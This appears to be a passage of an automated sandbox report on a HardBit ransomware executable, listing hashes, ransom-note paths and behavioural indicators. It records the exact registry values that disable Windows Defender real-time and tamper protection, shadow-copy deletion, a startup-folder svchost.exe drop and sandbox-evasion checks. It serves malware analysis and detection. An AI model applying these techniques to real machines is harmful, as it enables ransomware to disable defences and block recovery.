Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
28/02/2023, 20:04
230228-ytdzksch89 1004/02/2023, 22:36
230204-2jls8aeh82 1004/02/2023, 22:32
230204-2gdptseh74 1004/02/2023, 22:30
230204-2es2qseh68 1004/02/2023, 22:15
230204-16lw3aab7v 1028/12/2022, 14:55
221228-saetwadg2x 10Analysis
-
max time kernel
79s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
04/02/2023, 22:32
Static task
static1
Behavioral task
behavioral1
Sample
a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
Resource
win10v2004-20220812-en
General
-
Target
a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe
-
Size
333KB
-
MD5
3191feae778309eb99df4e4e25c62f1a
-
SHA1
d639821e3fbbb15e14b46aed5b98568e3ce045c3
-
SHA256
a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992
-
SHA512
c8d8734bb1d6e413d8b14e73952a4eb42fd5641ca49822db66f87ea7f0c1fb4c2a38232a652a11ca1c3c5564a517a2aaef8fb59fadff36a11afcce60e5d89798
-
SSDEEP
6144:P1S1JwNbEKcwwZTz2fYNR5OyxyM6qy9iJ4zv5fmRw9aC1oPtYdeAS9aqbGqeBD:9So4KcZbRwyxmf9iWhuw9aCqPtYMH9zs
Malware Config
Extracted
C:\Users\Admin\Favorites\Links\How To Restore Your Files.txt
Extracted
C:\Users\Admin\AppData\Local\Temp\readme-warning.hta
https://tox.chat/
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies RDP port number used by Windows 1 TTPs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regedit.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe -
Executes dropped EXE 1 IoCs
pid Process 2660 lsm.exe -
Loads dropped DLL 2 IoCs
pid Process 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe -
Checks registry for disk virtualization 3 TTPs 2 IoCs
Detecting virtualization disks is order done to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI\Disk&Ven_Dell&Prod_VIRTUAL_DISK regedit.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI\Disk&Ven_Dell&Prod_VIRTUAL_DISK regedit.exe -
Maps connected drives based on registry 3 TTPs 6 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\NextInstance regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum regedit.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum regedit.exe Key value enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\Count regedit.exe -
Sets desktop wallpaper using registry 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Documents\\hrdb.ico" a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\My Wallpaper.jpg" a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\HARDBIT.jpg" a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 932 sc.exe 2068 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI regedit.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI regedit.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI\Disk&Ven_Dell&Prod_VIRTUAL_DISK regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI regedit.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI\Disk&Ven_Dell&Prod_VIRTUAL_DISK regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI regedit.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI regedit.exe -
Checks processor information in registry 2 TTPs 31 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Signature regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Signature regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform ID regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Signature regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor regedit.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform ID regedit.exe -
Enumerates system info in registry 2 TTPs 64 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\Configuration Data regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BiosMinorRelease regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVendor regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1\Identifier regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0\Configuration Data regedit.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\PreferredProfile regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMinorRelease regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 regedit.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\ regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1\Component Information regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\Configuration Data regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Configuration Data regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\Configuration Data regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Component Information regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Identifier regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Configuration Data regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Configuration Data regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Capabilities regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardVersion regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\Component Information regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 regedit.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Component Information regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\Component Information regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Component Information regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BootArchitecture regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMajorRelease regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0\Component Information regedit.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\Component Information regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0\Identifier regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion regedit.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1888 vssadmin.exe 2924 vssadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000_CLASSES\.hardbit2\DefaultIcon\ = "C:\\Users\\Admin\\Documents\\hrdb.ico" a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000_CLASSES\.hardbit2 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000_CLASSES\.hardbit2\ a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000_CLASSES\.hardbit2\DefaultIcon a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe -
Runs net.exe
-
Runs regedit.exe 1 IoCs
pid Process 1632 regedit.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1580 powershell.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1632 regedit.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1568 WMIC.exe Token: SeSecurityPrivilege 1568 WMIC.exe Token: SeTakeOwnershipPrivilege 1568 WMIC.exe Token: SeLoadDriverPrivilege 1568 WMIC.exe Token: SeSystemProfilePrivilege 1568 WMIC.exe Token: SeSystemtimePrivilege 1568 WMIC.exe Token: SeProfSingleProcessPrivilege 1568 WMIC.exe Token: SeIncBasePriorityPrivilege 1568 WMIC.exe Token: SeCreatePagefilePrivilege 1568 WMIC.exe Token: SeBackupPrivilege 1568 WMIC.exe Token: SeRestorePrivilege 1568 WMIC.exe Token: SeShutdownPrivilege 1568 WMIC.exe Token: SeDebugPrivilege 1568 WMIC.exe Token: SeSystemEnvironmentPrivilege 1568 WMIC.exe Token: SeRemoteShutdownPrivilege 1568 WMIC.exe Token: SeUndockPrivilege 1568 WMIC.exe Token: SeManageVolumePrivilege 1568 WMIC.exe Token: 33 1568 WMIC.exe Token: 34 1568 WMIC.exe Token: 35 1568 WMIC.exe Token: SeIncreaseQuotaPrivilege 1568 WMIC.exe Token: SeSecurityPrivilege 1568 WMIC.exe Token: SeTakeOwnershipPrivilege 1568 WMIC.exe Token: SeLoadDriverPrivilege 1568 WMIC.exe Token: SeSystemProfilePrivilege 1568 WMIC.exe Token: SeSystemtimePrivilege 1568 WMIC.exe Token: SeProfSingleProcessPrivilege 1568 WMIC.exe Token: SeIncBasePriorityPrivilege 1568 WMIC.exe Token: SeCreatePagefilePrivilege 1568 WMIC.exe Token: SeBackupPrivilege 1568 WMIC.exe Token: SeRestorePrivilege 1568 WMIC.exe Token: SeShutdownPrivilege 1568 WMIC.exe Token: SeDebugPrivilege 1568 WMIC.exe Token: SeSystemEnvironmentPrivilege 1568 WMIC.exe Token: SeRemoteShutdownPrivilege 1568 WMIC.exe Token: SeUndockPrivilege 1568 WMIC.exe Token: SeManageVolumePrivilege 1568 WMIC.exe Token: 33 1568 WMIC.exe Token: 34 1568 WMIC.exe Token: 35 1568 WMIC.exe Token: SeDebugPrivilege 1580 powershell.exe Token: SeDebugPrivilege 620 a0138b24593483f50ae7656985b6d6cfe77f7676ba374026199ad49ad26f2992.exe Token: SeIncreaseQuotaPrivilege 2548 WMIC.exe Token: SeSecurityPrivilege 2548 WMIC.exe Token: SeTakeOwnershipPrivilege 2548 WMIC.exe Token: SeLoadDriverPrivilege 2548 WMIC.exe Token: SeSystemProfilePrivilege 2548 WMIC.exe Token: SeSystemtimePrivilege 2548 WMIC.exe Token: SeProfSingleProcessPrivilege 2548 WMIC.exe Token: SeIncBasePriorityPrivilege 2548 WMIC.exe Token: SeCreatePagefilePrivilege 2548 WMIC.exe Token: SeBackupPrivilege 2548 WMIC.exe Token: SeRestorePrivilege 2548 WMIC.exe Token: SeShutdownPrivilege 2548 WMIC.exe Token: SeDebugPrivilege 2548 WMIC.exe Token: SeSystemEnvironmentPrivilege 2548 WMIC.exe Token: SeRemoteShutdownPrivilege 2548 WMIC.exe Token: SeUndockPrivilege 2548 WMIC.exe Token: SeManageVolumePrivilege 2548 WMIC.exe Token: 33 2548 WMIC.exe Token: 34 2548 WMIC.exe Token: 35 2548 WMIC.exe Token: SeIncreaseQuotaPrivilege 